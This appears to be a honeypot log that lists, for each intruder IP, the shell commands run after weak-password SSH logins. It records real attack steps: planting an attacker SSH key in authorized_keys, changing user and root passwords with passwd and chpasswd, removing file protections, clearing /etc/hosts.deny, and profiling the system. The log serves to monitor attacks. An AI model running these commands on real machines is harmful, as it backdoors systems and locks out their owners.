$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:3FCHnsmE1OOq"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_109 (41.86.34.139) β€” Victoria, Seychelles Β· 1 session Β· 20 cmds
2026-05-09 07:14 EDT Β· as admin/password123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password123\nAlnuEMBtMPYZ\nAlnuEMBtMPYZ"|passwd|bash
$ Enter new UNIX password:
$ echo "password123\nAlnuEMBtMPYZ\nAlnuEMBtMPYZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_65 (172.191.157.64) β€” Boydton, United States Β· 1 session Β· 20 cmds
2026-05-09 07:14 EDT Β· as phptest/phptest
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "phptest\nxVE32INSvOh7\nxVE32INSvOh7"|passwd|bash
$ Enter new UNIX password:
$ echo "phptest\nxVE32INSvOh7\nxVE32INSvOh7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_19 (186.13.24.118) β€” Olivos, Argentina Β· 1 session Β· 20 cmds
2026-05-09 07:12 EDT Β· as sftpuser/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\n03fJ23dz2KLe\n03fJ23dz2KLe"|passwd|bash
$ Enter new UNIX password:
$ echo "password\n03fJ23dz2KLe\n03fJ23dz2KLe\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_106 (41.93.28.9) β€” Dar es Salaam, Tanzania Β· 1 session Β· 20 cmds
2026-05-09 06:59 EDT Β· as sftpuser/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\n1GDsQquSHpYc\n1GDsQquSHpYc"|passwd|bash
$ Enter new UNIX password:
$ echo "password\n1GDsQquSHpYc\n1GDsQquSHpYc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_118 (118.26.36.248) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-09 06:30 EDT Β· as Ubuntu/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n9k7wZ0Ep5Kw8\n9k7wZ0Ep5Kw8"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n9k7wZ0Ep5Kw8\n9k7wZ0Ep5Kw8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_8 (103.210.21.242) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-09 06:28 EDT Β· as deploy/123321
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123321\n6cAZiCW095rJ\n6cAZiCW095rJ"|passwd|bash
$ Enter new UNIX password:
$ echo "123321\n6cAZiCW095rJ\n6cAZiCW095rJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_119 (103.200.25.198) β€” Nguyα»…n Du, Vietnam Β· 2 sessions Β· 40 cmds
2026-05-09 05:48 EDT Β· as ubuntu/123@qaz, vsftp/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nuB1h532F0neR\nuB1h532F0neR"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nuB1h532F0neR\nuB1h532F0neR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123@qaz\nxaJ1PvPtZDxl\nxaJ1PvPtZDxl"|passwd|bash
$ echo "123@qaz\nxaJ1PvPtZDxl\nxaJ1PvPtZDxl\n"|passwd
🎭 dutch (192.42.116.93) β€” Amsterdam, The Netherlands Β· 1 session Β· 3 cmds
2026-05-09 05:54 EDT Β· as nil/
CPU profiling β†’ CPU profiling β†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778320496833378960" | sh // CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778320496833378960 // CPU profiling
$
🎭 rogue_root_118 (148.230.169.229) β€” LeΓ³n, Mexico Β· 3 sessions Β· 60 cmds
2026-05-09 02:55 EDT Β· as admin/administrator389, developer/passw0rd, oracle/oracle@1
CPU profiling β†’ CPU profiling β†’ ?
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "administrator389\nbDzwQAnJIxCL\nbDzwQAnJIxCL"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "administrator389\nbDzwQAnJIxCL\nbDzwQAnJIxCL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "passw0rd\njOzYoDyUApKo\njOzYoDyUApKo"|passwd|bash
$ echo "passw0rd\njOzYoDyUApKo\njOzYoDyUApKo\n"|passwd
$ echo -e "oracle@1\nQMNpcB932acw\nQMNpcB932acw"|passwd|bash
$ echo "oracle@1\nQMNpcB932acw\nQMNpcB932acw\n"|passwd
🎭 lotus_root_19 (49.206.243.163) β€” Bengaluru, India Β· 3 sessions Β· 60 cmds
2026-05-09 02:48 EDT Β· as admin/administrator389, developer/passw0rd, oracle/oracle@1
CPU profiling β†’ CPU profiling β†’ ?
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "oracle@1\nGIwc4MxPPciU\nGIwc4MxPPciU"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "oracle@1\nGIwc4MxPPciU\nGIwc4MxPPciU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "administrator389\nCQFVGNvKmFI1\nCQFVGNvKmFI1"|passwd|bash
$ echo "administrator389\nCQFVGNvKmFI1\nCQFVGNvKmFI1\n"|passwd
$ echo -e "passw0rd\nZ1g8OYFiE2Wu\nZ1g8OYFiE2Wu"|passwd|bash
$ echo "passw0rd\nZ1g8OYFiE2Wu\nZ1g8OYFiE2Wu\n"|passwd
🎭 burger_root_66 (107.150.103.210) β€” Los Angeles, United States Β· 3 sessions Β· 60 cmds
2026-05-09 03:11 EDT Β· as admin/administrator389, developer/passw0rd, oracle/oracle@1
CPU profiling β†’ CPU profiling β†’ ?
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "oracle@1\nLT1LT9txSdLi\nLT1LT9txSdLi"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "oracle@1\nLT1LT9txSdLi\nLT1LT9txSdLi\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "passw0rd\nBpzo93d51ca6\nBpzo93d51ca6"|passwd|bash
$ echo "passw0rd\nBpzo93d51ca6\nBpzo93d51ca6\n"|passwd
$ echo -e "administrator389\nZjjpdc0mk9kp\nZjjpdc0mk9kp"|passwd|bash
$ echo "administrator389\nZjjpdc0mk9kp\nZjjpdc0mk9kp\n"|passwd
🎭 ghost_root_18 (168.167.72.132) β€” Gaborone, Botswana Β· 3 sessions Β· 60 cmds
2026-05-08 02:39 EDT Β· as developer/passw0rd, oracle/oracle@1, test_user/test_user
CPU profiling β†’ CPU profiling β†’ ?
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "oracle@1\nTg58tjQCsOwH\nTg58tjQCsOwH"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "oracle@1\nTg58tjQCsOwH\nTg58tjQCsOwH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "passw0rd\npbobnOMmdb8u\npbobnOMmdb8u"|passwd|bash
$ echo "passw0rd\npbobnOMmdb8u\npbobnOMmdb8u\n"|passwd
$ echo -e "test_user\nnUdF7MWFgBKo\nnUdF7MWFgBKo"|passwd|bash
$ echo "test_user\nnUdF7MWFgBKo\nnUdF7MWFgBKo\n"|passwd
🎭 abba_root_7 (45.84.107.198) β€” Sundbyberg, Sweden Β· 1 session Β· 3 cmds
2026-05-09 03:09 EDT Β· as nil/
CPU profiling β†’ CPU profiling β†’ ?
$ echo "bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778310560325079387" | sh // CPU profiling
$ bash --help; ls /proc/1/; cat /proc/1/mounts; cat /proc/cpuinfo; echo __1778310560325079387 // CPU profiling
$
🎭 seoul_root_22 (61.72.55.130) β€” Namyangju, South Korea Β· 1 session Β· 19 cmds
2026-05-09 01:49 EDT Β· as root/oracle8
CPU profiling β†’ CPU profiling β†’ ?
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:5206dKk3ueZj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 panda_root_42 (101.76.248.214) β€” Nanjing, China Β· 1 session Β· 1 cmd
2026-05-09 01:06 EDT Β· as root/mail@2022!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_101 (23.249.28.115) β€” Hong Kong, Hong Kong Β· 2 sessions Β· 39 cmds
2026-05-08 23:42 EDT Β· as mysql/654321, root/cactiadmin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "654321\n4yOFz7YPhc48\n4yOFz7YPhc48"|passwd|bash
$ Enter new UNIX password:
